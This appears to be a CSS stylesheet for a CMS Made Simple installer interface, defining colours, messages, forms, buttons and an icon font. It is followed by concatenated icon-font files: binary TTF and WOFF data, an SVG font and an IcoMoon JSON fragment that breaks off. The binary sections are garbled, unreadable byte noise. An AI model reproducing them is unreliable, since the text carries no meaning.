AAUwBZgAAAEcBTAFmAAAA9QAZAIQAAAAAAAAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAABAAADmDAHg/+D/4AHgACAAAAABAAAAAAAAAAAAAAAgAAAAAAACAAAAAwAAABQAAwABAAAAFAAEADgAAAAKAAgAAgACAAEAIOYM//3//wAAAAAAIOYA//3//wAB/+MaBAADAAEAAAAAAAAAAAAAAAEAAf//AA8AAQAAAAEAAIVfVH9fDzz1AAsCAAAAAADPbEmFAAAAAM9sSYUAAP/gAgAB4AAAAAgAAgAAAAAAAAABAAAB4P/gAAACAAAAAAACAAABAAAAAAAAAAAAAAAAAAAAEQAAAAAAAAAAAAAAAAEAAAACAAAAAgAABwIAAAACAAAAAgAAAAIAAAACAAAAAgAAAAIAAAACAAAAAgAAAAIAAAACAAAAAABQAAARAAAAAAAOAK4AAQAAAAAAAQAQAAAAAQAAAAAAAgAOAE4AAQAAAAAAAwAQACYAAQAAAAAABAAQAFwAAQAAAAAABQAWABAAAQAAAAAABgAIADYAAQAAAAAACgAoAGwAAwABBAkAAQAQAAAAAwABBAkAAgAOAE4AAwABBAkAAwAQACYAAwABBAkABAAQAFwAAwABBAkABQAWABAAAwABBAkABgAQAD4AAwABBAkACgAoAGwAYwBtAHMAbQBzAC0AdQBpAFYAZQByAHMAaQBvAG4AIAAxAC4AMABjAG0AcwBtAHMALQB1AGljbXNtcy11aQBjAG0AcwBtAHMALQB1AGkAUgBlAGcAdQBsAGEAcgBjAG0AcwBtAHMALQB1AGkARwBlAG4AZQByAGEAdABlAGQAIABiAHkAIABJAGMAbwBNAG8AbwBuAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==) format('woff');
	font-weight: normal;
	font-style: normal;
}

[class^="icon-"], [class*=" icon-"] {
	font-family: 'cmsms-ui';
	speak: none;
	font-style: normal;
	font-weight: normal;
	font-variant: normal;
	text-transform: none;
	line-height: 1;
	-webkit-font-smoothing: antialiased;
	-moz-osx-font-smoothing: grayscale;
	text-align: center;
}

.icon-stack:before {
	content: "\e607";
}
.icon-folder-open:before {
	content: "\e600";
}
.icon-calendar:before {
	content: "\e608";
}
.icon-warning:before {
	content: "\e601";
}
.icon-info:before {
	content: "\e602";
}
.icon-cancel-circle:before {
	content: "\e603";
}
.icon-checkmark-circle:before {
	content: "\e604";
}
.icon-spam:before {
	content: "\e605";
}
.icon-loop:before {
	content: "\e606";
}
.icon-googleplus:before {
	content: "\e609";
}
.icon-facebook:before {
	content: "\e60a";
}
.icon-twitter:before {
	content: "\e60b";
}
.icon-linkedin:before {
	content: "\e60c";
}

.icon-asterisk {
	font-family: 'Open Sans', 'Helvetica Neue', Helvetica, Arial, sans-serif !important;
}

.icon-asterisk:before {
	content: " *";
}

/* --- Colours --- */

.cmsms-ui .red {
	color: #A95252;
}

.cmsms-ui .blue {
	color: #4D8796;
}

.cmsms-ui .green {
	color: #52A954;
}

.cmsms-ui .yellow {
	color: #96904D;
}

.cmsms-ui .orange {
	color: #F79838;
}

/* --- Messages --- */

.cmsms-ui .message {
	position: relative;
	min-height: 18px;
	margin: 1em 0;
	height: auto;
	background-color: #EFEFEF;
	padding: 1em;
	line-height: 1.33;
	color: rgba(0,0,0,.6);
	-webkit-transition: opacity .1s ease,color .1s ease,background .1s ease,-webkit-box-shadow .1s ease;
	-moz-transition: opacity .1s ease,color .1s ease,background .1s ease,box-shadow .1s ease;
	transition: opacity .1s ease,color .1s ease,background .1s ease,box-shadow .1s ease;
	-webkit-box-sizing: border-box;
	-moz-box-sizing: border-box;
	-ms-box-sizing: border-box;
	box-sizing: border-box;
	border-radius: .225em;
}

.cmsms-ui .message.red {
	background-color: #F1D7D7;
	color: #A95252;
}

.cmsms-ui .message.blue {
	background-color: #E6F4F9;
	color: #4D8796;
}

.cmsms-ui .message.green {
	background-color: #DEFCD5;
	color: #52A954;
}

.cmsms-ui .message.yellow {
	background-color: #F6F3D5;
	color: #96904D;
}

.cmsms-ui .icon.message {
	display: table;
	width: 100%;
}

.cmsms-ui .icon.message > .message-icon {
	display: table-cell;
	vertical-align: middle;
	text-align: left;
	font-size: 3.5em;
	opacity: .3;
}

.cmsms-ui .icon.message > .message-icon + .content {
	padding-left: .5em;
	display: table-cell;
	vertical-align: middle;
	margin-top: 0;
}

/* --- Labels --- */

.cmsms-ui .label {
	display: inline-block;
	vertical-align: middle;
	margin: -.25em .25em 0;
	background-color: #efefef;
	padding: .1em .5em;
	text-transform: uppercase;
	font-weight: 400;
	font-size: .875em;
	border-radius: 3px;
	-webkit-transition: background .1s linear;
	-moz-transition: background .1s linear;
	transition: background .1s linear;
}

.cmsms-ui .label.circle {
	min-height: 1em;
	max-height: 2em;
	padding: .5em !important;
	line-height: 1em;
	text-align: center;
	border-radius: 500px;
}

.cmsms-ui .label.red {
	background-color: #A95252;
	color: #fff;
}

.cmsms-ui .label.blue {
	background-color: #6ECFF5;
	color: #fff;
}

.cmsms-ui .label.green {
	background-color: #52A954;
	color: #fff;
}

.cmsms-ui .label.yellow {
	background-color: #96904D;
	color: #fff;
}

.cmsms-ui .label.orange {
	background-color: #F05940;
	color: #fff;
}

/* --- Forms --- */

.cmsms-ui .form-row {
	margin-bottom: .7em;
}
.cmsms-ui .installer-form label {
	display: inline-block;
	padding-right: 25px;
}

.cmsms-ui .installer-form .form-field {
	display: inline-block;
	height: 34px;
	padding: 6px 12px;
	font-size: .875em;
	line-height: 1.42857143;
	color: #666;
	background-color: #fff;
	border: 1px solid #ddd;
	border-radius: 2px;
	-webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075);
	-moz-box-shadow: inset 0 1px 1px rgba(0,0,0,.075);
	-o-box-shadow: inset 0 1px 1px rgba(0,0,0,.075);
	box-shadow: inset 0 1px 1px rgba(0,0,0,.075);
	-webkit-transition: border-color ease-in-out .15s,box-shadow ease-in-out .15s;
	transition: border-color ease-in-out .15s,box-shadow ease-in-out .15s;
}

.cmsms-ui .installer-form select.form-field {
	height: auto;
}

.cmsms-ui .installer-form .corner {
	background-color: transparent;
	border-color: #f2f2f2;
	position: absolute;
	top: 1px;
	right: 1px;
	z-index: 10;
	margin: 0;
	width: 25px;
	height: 25px;
	padding: 0;
	text-align: center;
	-webkit-transition: color .2s ease;
	-moz-transition: color .2s ease;
	transition: color .2s ease;
}

.cmsms-ui .installer-form .corner:after {
	position: absolute;
	content: "";
	right: 0;
	top: 0;
	z-index: -1;
	width: 0;
	height: 0;
	border-top: 0 solid transparent;
	border-right: 25px solid transparent;
	border-bottom: 25px solid transparent;
	border-left: 0 solid transparent;
	border-right-color: inherit;
	-webkit-transition: border-color .2s ease;
	-moz-transition: border-color .2s ease;
	transition: border-color .2s ease;
}

.cmsms-ui .installer-form .corner.red:after {
	border-right-color: #F1D7D7;
	color: #A95252;
}

.cmsms-ui .installer-form .form-field:focus {
	border-color: rgba(0,0,0,.2);
	border-bottom-left-radius: 0;
	border-top-left-radius: 0;
	outline: 0;
}

.cmsms-ui .installer-form input[type="text"].form-field:focus,
.cmsms-ui .installer-form input[type="password"].form-field:focus,
.cmsms-ui .installer-form textarea.form-field:focus,
.cmsms-ui .installer-form input[type="email"].form-field:focus {
	border-color: #FDA66B;
	-webkit-appearance: none;
	-webkit-box-shadow: .3em 0 0 0 #FDA66B inset;
	box-shadow: .3em 0 0 0 #FDA66B inset;
}

.cmsms-ui .installer-form .full-width {
	width: 100%;
}

.cmsms-ui .bigtext {
    max-height: 20em;
    max-width: 60em;
    overflow-y: none;
    overflow-x: none;
}

/* --- Buttons --- */

.cmsms-ui .action-button {
	display: inline-block;
	margin: 20px 0;
	font-weight: 400;
	text-align: center;
	vertical-align: middle;
	cursor: pointer;
	color: #666;
	border: none;
	white-space: nowrap;
	padding: 6px 18px;
	font-size: .875em;
	line-height: 1.42857143;
	text-decoration: none;
	border-radius: 2px;
	-webkit-user-select: none;
	-moz-user-select: none;
	-ms-user-select: none;
	user-select: none;
	background-color: transparent;
	background-image: -webkit-gradient(linear,left top,left bottom,from(rgba(0,0,0,0)),to(rgba(0,0,0,.05)));
	background-image: -webkit-linear-gradient(rgba(0,0,0,0),rgba(0,0,0,.05));
	background-image: -moz-linear-gradient(rgba(0,0,0,0),rgba(0,0,0,.05));
	background-image: linear-gradient(rgba(0,0,0,0),rgba(0,0,0,.05));
	-webkit-tap-highlight-color: rgba(0,0,0,0);
	-webkit-box-shadow: 0 0 0 1px rgba(0,0,0,.08) inset;
	box-shadow: 0 0 0 1px rgba(0,0,0,.08) inset;
	-webkit-transition: opacity .25s ease,background-color .25s ease,color .25s ease,background .25s ease,-webkit-box-shadow .25s ease;
	-moz-transition: opacity .25s ease,background-color .25s ease,color .25s ease,background .25s ease,box-shadow .25s ease;
	transition: opacity .25s ease,background-color .25s ease,color .25s ease,background .25s ease,box-shadow .25s ease;
}

.cmsms-ui .action-button.positive {
	background-color: #5BBD72 !important;
	color: #fff;
}

.cmsms-ui .action-button.negative {
	background-color: #D95C5C !important;
	color: #fff;
}

.cmsms-ui .action-button.blue {
	background-color: #6ECFF5 !important;
	color: #fff;
}

.cmsms-ui .action-button.orange {
	background-color: #E96633 !important;
	color: #fff;
}

.cmsms-ui .action-button.social {
	color: #fff;
	font-weight: 700;
	text-transform: uppercase;
}

.cmsms-ui .action-button.google {
	background-color: #D34836;
}

.cmsms-ui .action-button.facebook {
	background-color: #3B579D;
}

.cmsms-ui .action-button.twitter {
	background-color: #4092CC;
}

.cmsms-ui .action-button.linkedin {
	background-color: #1F88BE;
}

.cmsms-ui .action-button:hover,
.cmsms-ui .action-button:active {
	background-image: none;
}

.cmsms-ui .action-button.positive:hover,
.cmsms-ui .action-button.positive:active {
	background-color: #58CB73 !important;
	color: #fff;
}

.cmsms-ui .action-button.negative:hover
.cmsms-ui .action-button.negative:active {
	background-color: #D24B4C !important;
	color: #fff;
}

.cmsms-ui .action-button.blue:hover,
.cmsms-ui .action-button.blue:active {
	background-color: #1AB8F3 !important;
	color: #fff;
}

.cmsms-ui .action-button.orange:hover,
.cmsms-ui .action-button.orange:active {
	background-color: #FF7038;
	color: #fff;
}

/* --- Tables --- */

.cmsms-ui .table {
	width: 100%;
	border-collapse: collapse;
}

.cmsms-ui .table caption {
	font-weight: bold;
	text-align: left;
	font-size: 1.25em;
}

.cmsms-ui .table thead {
	border-bottom: 1px solid rgba(0,0,0,.03);
}

.cmsms-ui .bordered-table td, .cmsms-ui .bordered-table th {
  border: 1px solid #ddd;
}

.cmsms-ui .table th,
.cmsms-ui .table tr,
.cmsms-ui.table td {
	border-collapse: collapse;
	-webkit-box-sizing: border-box;
	-moz-box-sizing: border-box;
	-ms-box-sizing: border-box;
	box-sizing: border-box;
	-webkit-transition: all .1s ease-out;
	-moz-transition: all .1s ease-out;
	transition: all .1s ease-out;
}

.cmsms-ui .table th {
	cursor: auto;
	background-color: #f2f2f2;
	text-align: left;
	color: rgba(0,0,0,.8);
	padding: .5em .7em;
	vertical-align: middle;
}

.cmsms-ui .table td {
	padding: .4em .7em;
	vertical-align: middle;
}

.cmsms-ui .table.zebra-table tr.even,
.cmsms-ui .table.zebra-table td.even {
	background-color: #f9f9f9;
}

.cmsms-ui .table tr.warning,
.cmsms-ui .table td.warning {
	background-color: #FBF6E9 !important;
	color: #7D6C00;
}

.cmsms-ui .table tr.error,
.cmsms-ui .table td.error {
	background-color: #F9F4F4;
	color: #CD2929;
}

.cmsms-ui .table tr.warning:hover,
.cmsms-ui .table td.warning:hover {
	background-color: #F3EDDC !important;
	color: #7D6C00;
}

.cmsms-ui .table tr:hover.error,
.cmsms-ui .table td:hover.error {
	background-color: #F2E8E8;
	color: #CD2929;
}

.cmsms-ui .table .tests-infotext {
	display: inline-block;
	font-size: .875em;
	line-height: 1.3;
}


/* HEADER */

.cmsms-ui .header-section {
	text-align: center;
	padding: 28px 0 25px 0;
	line-height: 1;
}

.cmsms-ui .header-section .installer-title {
	display: block;
	font-size: 1.75em;
	font-weight: 300;
}

/* CONTENT */

.cmsms-ui .installer-section {
	background: #fff;
	border-radius: 2px;
	-webkit-box-shadow: 0 0 6px rgba(0, 0, 0, .1);
	-moz-box-shadow: 0 0 6px rgba(0, 0, 0, .1);
	-o-box-shadow: 0 0 6px rgba(0, 0, 0, .1);
	box-shadow: 0 0 6px rgba(0, 0, 0, .1);
}

.cmsms-ui .existing-info li {
	margin-bottom: .3em;
	word-break: break-word;
}

/* -- Aside steps indicator --- */

.cmsms-ui .installer-steps ol {
	margin: 0;
	padding-left: 20px;
	list-style: decimal;
}

.cmsms-ui .installer-steps ol > li {
	margin-bottom: 1.2em;
}

.cmsms-ui .installer-steps ol > li:hover {
	color: #666;
}

.cmsms-ui .installer-steps {
	color: #666;
	font-size: .875em;
}

.cmsms-ui .step-title {
	margin-bottom: 0;
}

.cmsms-ui .current-step {
	color: #F79838;
}

.cmsms-ui .done-step {
	color: #7AB949;
}

.cmsms-ui .step-description {
	margin-top: 0;
	line-height: 1.3;
	font-size: .928571em;
	color: #333;
}

.cmsms-ui .current-step .step-description {
	color: #333;
}

/* --- main content section --- */

.cmsms-ui .info {
	font-size: .875em;
}

.cmsms-ui .installer-form label {
	font-size: .875em;
}

.cmsms-ui .installer-form fieldset {
	margin: 0;
	padding: 15px;
	border: 1px solid #ddd;
	border-radius: 3px;
	background-color: #fefefe;
}

.cmsms-ui .installer-form .corner .icon-asterisk {
	margin-left: 12px;
}

.cmsms-ui .installer-content-section h1 {
	font-size: 1.5em;
}

.cmsms-ui .installer-test-legend {
	margin-top: 25px;
}

.cmsms-ui .installer-test-legend th {
	background-color: #f2f2f2 !important;
}

.cmsms-ui .table.installer-test-information {
	font-size: .875em;
}

#bottom_nav {
    display: none;
}

/* FOOTER */
.cmsms-ui .footer-section {
	text-align: center;
	padding: 10px 0 15px 0;
}

.cmsms-ui .footer-info a {
	font-size: .875em;
	color: #666;
	font-weight: 700;
}

.cmsms-ui .footer-section small {
	display: block;
}
|
��LPT_�cmsms-uiRegularVersion 1.0cmsms-ui�0OS/2"���`cmapU�cLgasphglyfR`Khp	head����
�6hhea��
�$hmtx
�Dloca0,$maxp�P name���pBpost� �LfGLf��@�����  8
 ����� ���������797979�
%!33�`�``@@�@�� ���@@����1?!512#!".67>34>32#".572#'4>3�X��	
�N
	� 				 	
,
	���qO	�L		�	��				�	``	���$"32>54.#3#5#535#5335]F((F]55]F((F]5 @@`�  ` �(F]55]F((F]55]F(`@@�� � � ���%"32>54.##'#57'53735]F((F]55]F((F]5�SS-SS-SS-SS-�(F]55]F((F]55]F(�SS-SS-SS-SS-���"32>54.#'775]F((F]55]F((F]50j/;���(F]55]F((F]55]F(�`�1K�����	%#375'#535#53���P@@@@pp���`@@������3.#">3235".'7#732>7'#�).2)K?/<
$/8&"
H�K�&"
H�K).2)K?/<
$/8�
,=$-"
H�K��
H�K
,=$-"�	%
%%'7%77%7��������3��3��3��3�@����VVVVV���g��g����#'493#73#73#3#73#73#'3#73#73#%3##5##5#!#!!�@@`@@`@@��@@`@@`@@`@@`@@`@@��@@`@�@@�@ �`� @@@@@�@@@@@�@@@@@@@`    �� `�����
h���704044017>'.#&%54.'&>665'>5''5'57577667.54>7"&.'>0&<#21.'."&&7<645<.5v!!�
��
<;+(8�
` `` `�]		

[�

 	�-�&(''�*	# 



a__a�		"d	<!

		���1!"3!2>'.###7#737&>;#"3��� W 	Ta/-(YG	_�
��

V
���I0&O(I����!"3!2>'.##".'2:32>7.'22326263.'2&2"33.7&>7&6&6'>32>7>7��� W  <Z9!"



	&-0


	�
��

V
�*WF-
			





���2O!"3!2>54.##53".54>32##54.#"#53>32���T�@@ 				@		@@���T�`��				��		��(
�.m��_<��lI��lI������
8��4V��. l ���N&\6
(l		N	&	\		>	
(lcmsms-uiVersion 1.0cmsms-uicmsms-uicmsms-uiRegularcmsms-uiGenerated by IcoMoon<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd" >
<svg xmlns="http://www.w3.org/2000/svg">
<metadata>Generated by IcoMoon</metadata>
<defs>
<font id="cmsms-ui" horiz-adv-x="512">
<font-face units-per-em="512" ascent="480" descent="-32" />
<missing-glyph horiz-adv-x="512" />
<glyph unicode="&#x20;" d="" horiz-adv-x="256" />
<glyph unicode="&#xe600;" d="M416 0l96 256h-416l-96-256zM64 288l-64-288v416h144l64-64h208v-64z" />
<glyph unicode="&#xe601;" d="M256 400.638l-172.417-368.638h344.834l-172.417 368.638zM256 480v0c11.035 0 22.070-7.441 30.442-22.324l218.536-435.556c16.745-29.766 2.5-54.12-31.651-54.12h-434.654c-34.152 0-48.395 24.354-31.652 54.12l218.537 435.556c8.372 14.883 19.407 22.324 30.442 22.324zM224 96c0 17.673 14.327 32 32 32s32-14.327 32-32c0-17.673-14.327-32-32-32-17.673 0-32 14.327-32 32zM256 288c17.673 0 32-14.327 32-32l-10-96h-44l-10 96c0 17.673 14.327 32 32 32z" />
<glyph unicode="&#xe602;" d="M256 480c-141.385 0-256-114.615-256-256s114.615-256 256-256 256 114.615 256 256-114.615 256-256 256zM224 384h64v-64h-64v64zM320 64h-128v32h32v128h-32v32h96v-160h32v-32z" />
<glyph unicode="&#xe603;" d="M256 480c-141.385 0-256-114.615-256-256s114.615-256 256-256 256 114.615 256 256-114.615 256-256 256zM384 306.745l-82.744-82.745 82.744-82.744v-45.256h-45.256l-82.744 82.744-82.745-82.744h-45.255v45.256l82.745 82.744-82.745 82.745v45.255h45.255l82.745-82.745 82.744 82.745h45.256v-45.255z" />
<glyph unicode="&#xe604;" d="M256 480c-141.385 0-256-114.615-256-256s114.615-256 256-256 256 114.615 256 256-114.615 256-256 256zM208 64l-106 138 47 49 59-75 185 151 23-23-208-240z" />
<glyph unicode="&#xe605;" d="M512 112l-144 368h-224l-144-144v-224l144-144h224l144 144v224l-144 144zM288 64h-64v64h64v-64zM288 192h-64v192h64v-192z" />
<glyph unicode="&#xe606;" d="M437.011 405.010c-46.326 46.328-110.318 74.99-181.011 74.99-109.744 0-203.345-69.064-239.749-166.094l59.938-22.477c27.302 72.773 97.503 124.571 179.811 124.571 53.020 0 101.010-21.5 135.753-56.247l-71.753-71.753h192v192l-74.989-74.99zM256 32c-53.020 0-101.013 21.496-135.756 56.244l71.756 71.756h-192v-192l74.997 74.997c46.323-46.331 110.309-74.997 181.003-74.997 109.745 0 203.346 69.064 239.75 166.094l-59.938 22.477c-27.302-72.773-97.503-124.571-179.812-124.571z" />
<glyph unicode="&#xe607;" d="M512 320l-256 128-256-128 256-128 256 128zM256 405.515l171.029-85.515-171.029-85.515-171.029 85.515 171.029 85.515zM460.722 249.639l51.278-25.639-256-128-256 128 51.278 25.639 204.722-102.361zM460.722 153.639l51.278-25.639-256-128-256 128 51.278 25.639 204.722-102.361z" />
<glyph unicode="&#xe608;" d="M160 288h64v-64h-64zM256 288h64v-64h-64zM352 288h64v-64h-64zM64 96h64v-64h-64zM160 96h64v-64h-64zM256 96h64v-64h-64zM160 192h64v-64h-64zM256 192h64v-64h-64zM352 192h64v-64h-64zM64 192h64v-64h-64zM416 480v-32h-64v32h-224v-32h-64v32h-64v-512h480v512h-64zM448 0h-416v352h416v-352z" />
<glyph unicode="&#xe609;" d="M0.403 45.168c-0.122 1.266-0.226 2.535-0.292 3.815 0.065-1.28 0.17-2.549 0.292-3.815zM117.954 197.426c46.005-1.369 76.867 46.349 68.931 106.599-7.947 60.24-51.698 108.584-97.704 109.961-46.013 1.365-76.87-44.741-68.926-105 7.941-60.234 51.676-110.187 97.699-111.56zM512 352v42.655c0 46.94-38.391 85.345-85.329 85.345h-341.328c-46.138 0-84.006-37.116-85.282-82.963 29.181 25.693 69.662 47.158 111.437 47.158 44.652 0 178.622 0 178.622 0l-39.974-33.809h-56.634c37.565-14.402 57.578-58.062 57.578-102.861 0-37.624-20.905-69.977-50.444-92.984-28.822-22.451-34.286-31.854-34.286-50.939 0-16.289 30.873-44 47.016-55.394 47.191-33.269 62.458-64.156 62.458-115.728 0-8.214-1.021-16.415-3.033-24.48h153.871c46.937 0 85.328 38.375 85.328 85.345v266.654h-96v-95.999h-32v96h-95.999v32h95.999v96h32v-96h96zM92.943 97.032c10.807 0 20.711 0.295 30.968 0.295-13.573 13.167-24.313 29.3-24.313 49.19 0 11.804 3.782 23.168 9.067 33.26-5.391-0.385-10.895-0.497-16.563-0.497-37.178 0-68.753 12.038-92.102 31.927v-33.621l0.003-100.865c26.72 12.687 58.444 20.311 92.94 20.311zM1.71 36.371c-0.556 2.729-0.983 5.503-1.271 8.317 0.287-2.814 0.715-5.588 1.271-8.317zM227.725 3.577c-7.529 29.403-34.227 43.982-71.444 69.784-13.536 4.366-28.447 6.937-44.447 7.104-44.809 0.482-86.554-17.471-110.108-44.186 7.96-38.853 42.517-68.279 83.617-68.279h143.222c0.908 5.564 1.348 11.316 1.348 17.216 0 6.267-0.767 12.396-2.188 18.361z" />
<glyph unicode="&#xe60a;" d="M426.672 480h-341.33c-46.936 0-85.342-38.407-85.342-85.344v-341.313c0-46.969 38.406-85.343 85.342-85.343l341.33 0.001c46.938 0 85.328 38.373 85.328 85.344v341.311c0 46.937-38.391 85.344-85.328 85.344zM435.296 224h-83.296v-224h-96v224h-46.263v73.282h46.263v47.593c0 64.671 27.896 103.125 103.935 103.125h87.622v-79.285h-71.565c-21.241 0.035-23.876-11.076-23.876-31.756l-0.116-39.677h96l-12.704-73.282z" />
<glyph unicode="&#xe60b;" d="M426.671 480h-341.328c-46.937 0-85.343-38.405-85.343-85.345v-341.311c0-46.969 38.406-85.344 85.343-85.344h341.328c46.938 0 85.329 38.375 85.329 85.345v341.31c0 46.94-38.391 85.345-85.329 85.345zM419.026 309.083c0.164-3.671 0.245-7.364 0.245-11.074 0-113.107-84.608-243.534-239.329-243.534-47.502 0-91.717 14.174-128.943 38.459 6.58-0.794 13.276-1.197 20.065-1.197 39.411 0 75.679 13.685 104.467 36.641-36.808 0.69-67.872 25.438-78.577 59.441 5.137-1 10.406-1.537 15.826-1.537 7.672 0 15.103 1.048 22.16 3.004-38.48 7.866-67.475 42.458-67.475 83.928 0 0.361 0 0.719 0.008 1.076 11.34-6.41 24.312-10.26 38.1-10.705-22.571 15.349-37.421 41.546-37.421 71.244 0 15.685 4.147 30.389 11.389 43.029 41.487-51.785 103.468-85.86 173.377-89.431-1.435 6.266-2.179 12.798-2.179 19.507 0 47.269 37.663 85.59 84.115 85.59 24.195 0 46.059-10.393 61.401-27.029 19.16 3.838 37.162 10.96 53.416 20.771-6.281-19.988-19.617-36.761-36.983-47.355 17.013 2.069 33.226 6.67 48.31 13.477-11.273-17.162-25.535-32.238-41.972-44.305z" />
<glyph unicode="&#xe60c;" d="M426 480h-340c-47.3 0-86-38.7-86-86v-340c0-47.3 38.7-86 86-86h340c47.3 0 86 38.7 86 86v340c0 47.3-38.7 86-86 86zM192 64h-64v224h64v-224zM160 320c-17.673 0-32 14.327-32 32s14.327 32 32 32 32-14.327 32-32-14.327-32-32-32zM416 64h-64v128c0 17.673-14.327 32-32 32s-32-14.327-32-32v-128h-64v224h64v-39.736c13.199 18.132 33.376 39.736 56 39.736 39.765 0 72-35.817 72-80v-144z" />
</font></defs></svg>�0OS/2"���`cmapU�cLgasphglyfR`Khp	head����
�6hhea��
�$hmtx
�Dloca0,$maxp�P name���pBpost� �LfGLf��@�����  8
 ����� ���������797979�
%!33�`�``@@�@�� ���@@����1?!512#!".67>34>32#".572#'4>3�X��	
�N
	� 				 	
,
	���qO	�L		�	��				�	``	���$"32>54.#3#5#535#5335]F((F]55]F((F]5 @@`�  ` �(F]55]F((F]55]F(`@@�� � � ���%"32>54.##'#57'53735]F((F]55]F((F]5�SS-SS-SS-SS-�(F]55]F((F]55]F(�SS-SS-SS-SS-���"32>54.#'775]F((F]55]F((F]50j/;���(F]55]F((F]55]F(�`�1K�����	%#375'#535#53���P@@@@pp���`@@������3.#">3235".'7#732>7'#�).2)K?/<
$/8&"
H�K�&"
H�K).2)K?/<
$/8�
,=$-"
H�K��
H�K
,=$-"�	%
%%'7%77%7��������3��3��3��3�@����VVVVV���g��g����#'493#73#73#3#73#73#'3#73#73#%3##5##5#!#!!�@@`@@`@@��@@`@@`@@`@@`@@`@@��@@`@�@@�@ �`� @@@@@�@@@@@�@@@@@@@`    �� `�����
h���704044017>'.#&%54.'&>665'>5''5'57577667.54>7"&.'>0&<#21.'."&&7<645<.5v!!�
��
<;+(8�
` `` `�]		

[�

 	�-�&(''�*	# 



a__a�		"d	<!

		���1!"3!2>'.###7#737&>;#"3��� W 	Ta/-(YG	_�
��

V
���I0&O(I����!"3!2>'.##".'2:32>7.'22326263.'2&2"33.7&>7&6&6'>32>7>7��� W  <Z9!"



	&-0


	�
��

V
�*WF-
			





���2O!"3!2>54.##53".54>32##54.#"#53>32���T�@@ 				@		@@���T�`��				��		��(
�.m��_<��lI��lI������
8��4V��. l ���N&\6
(l		N	&	\		>	
(lcmsms-uiVersion 1.0cmsms-uicmsms-uicmsms-uiRegularcmsms-uiGenerated by IcoMoonwOFFOTTO
�

TCFF ���S��OS/2�``"��cmap<LLU�cgasp�head�66����hhea�$$��hmtx�DDmaxp	0Pname	8BB���post
|  	cmsms-ui:���
S���
S����k���t��	�	"',16;@EJOTYcmsms-uicmsms-uiu0u1u20uE600uE601uE602uE603uE604uE605uE606uE607uE608uE609uE60AuE60BuE60C�

1�U��;�*=�\��������4���4�+����K����4�$��K�d��K���%�@���@����������|�o�H�m|si��F�i�|����o�H������k����������}�y�y}}y�y�}�����T���}�y�+_������������t�!�����!��!���!��!�����!��!���!�k+ˋ�KK�������������k���닋�4���k���t�!�����!��!���!��!�����!��!���!���A88�8�^^�8�88^�����8ދ����8�޸��^���t�!�����!��!���!��!�����!��!���!�[�4!����@�M�+�t�d������$��t��$�$��t�$�$�t��$�$��t�$�$;�4K���ˋ�K��K���Tˋ��T�I�)]�K�D���.Ff*�t��ҿ݋���v�hCC�T���T@@�I�	V�[�h���T���T���]�nҋ���а�O�pBDW9���������������������?5�?5�?�?��a�0�q���������a$�a��q���������a$�4��ˋ�KK���ˋ�KK���ˋ�KK����ˋ�KK���ˋ�KK���ˋ�KK�+�4ˋ�KK���ˋ�KK���ˋ�KK����ˋ�KK�����kK����t��kK���K�����t����K���t�4����4�������������������
�,�����ǃ�_�]�]�l]�O�O�Y����/����e�\���]�ef�]������������ciS��}�_�_�evkntnt���x�z�p��j�l�W�������.����������+��+k���+���닋뫋�+��7��������}�����������������f�k�t��j�&������0N�������������vk��p�f�~�|�{�^�aytp�d�n���$��������������?�t��\�ee�\����\�e���������������e�\����8���t+���t]��Թ����̧�׋㋋<C�v����v�c�~B�?�t��\�ee�\����\�e���������������e�\���?��������7��/�[�_�f�������������f�l���������������d�n���������������t�|����������W�iч�����������������z�������w~{z��������z||{�>�t��\�dd�\����\�d���������������d�\��~�4K���tˋ��tk��y�}������������}�y�y}}y�����K�����}�y�y�}}�y��K���tˋ�c���������g�_��$�����
�LfGLf��@�����  8
 ����� ����������_T_<��lI��lI������P�N&\6
(l		N	&	\		>	
(lcmsms-uiVersion 1.0cmsms-uicmsms-uicmsms-uiRegularcmsms-uiGenerated by IcoMoon{
	"IcoMoonType": "selection",
	"icons": [
		{
			"icon": {
				"paths": [
					"M512 0c-282.77 0-512 229.23-512 512s229.23 512 512 512 512-229.23 512-512-229.23-512-512-512zM416 832l-212-276 94-98 118 150 370-302 46 46-416 480z"
				],
				"tags": [
					"checkmark-circle",
					"tick",
					"correct"
				],
				"grid": 16
			},
			"properties": {
				"id": 251,
				"order": 1,
				"prevSize": 32,
				"code": 58884,
				"name": "checkmark-circle",
				"ligatures": ""
			},
			"setIdx": 0,
			"iconIdx": 251
		},
		{
			"icon": {
				"paths": [
					"M512 0c-282.77 0-512 229.23-512 512s229.23 512 512 512 512-229.23 512-512-229.23-512-512-512zM768 346.51l-165.488 165.49 165.488 165.488v90.512h-90.512l-165.488-165.488-165.49 165.488h-90.51v-90.512l165.49-165.488-165.49-165.49v-90.51h90.51l165.49 165.49 165.488-165.49h90.512v90.51z"
				],
				"tags": [
					"cancel-circle",
					"close",
					"remove",
					"delete"
				],
				"grid": 16
			},
			"properties": {
				"id": 250,
				"order": 2,
				"prevSize": 32,
				"code": 58883,
				"name": "cancel-circle",
				"ligatures": ""
			},
			"setIdx": 0,
			"iconIdx": 250
		},
		{
			"icon": {
				"paths": [
					"M1024 736 736 0h-448l-288 288v448l288 288h448l288-288v-448l-288-288zM576 832h-128v-128h128v128zM576 576h-128v-384h128v384z"
				],
				"tags": [
					"spam",
					"notice",
					"notification",
					"exclamation"
				],
				"grid": 16
			},
			"properties": {
				"id": 252,
				"order": 3,
				"prevSize": 32,
				"code": 58885,
				"name": "spam",
				"ligatures": ""
			},
			"setIdx": 0,
			"iconIdx": 252
		},
		{
			"icon": {
				"paths": [
					"M832 960l192-512h-832l-192 512zM128 384l-128 576v-832h288l128 128h416v128z"
				],
				"tags": [
					"folder-open",
					"directory",
					"category",
					"browse"
				],
				"grid": 16
			},
			"properties": {
				"id": 47,
				"order": 4,
				"prevSize": 32,
				"code": 58880,
				"name": "folder-open",
				"ligatures": ""
			},
			"setIdx": 0,
			"iconIdx": 47
		},
		{
			"icon": {
				"paths": [
					"M512 0c-282.77 0-512 229.23-512 512s229.23 512 512 512 512-229.23 512-512-229.23-512-512-512zM448 192h128v128h-128v-128zM640 832h-256v-64h64v-256h-64v-64h192v320h64v64z"
				],
				"tags": [
					"info",
					"information"
				],
				"grid": 16
			},
			"properties": {
				"id": 248,
				"order": 5,
				"prevSize": 32,
				"code": 58882,
				"name": "info",
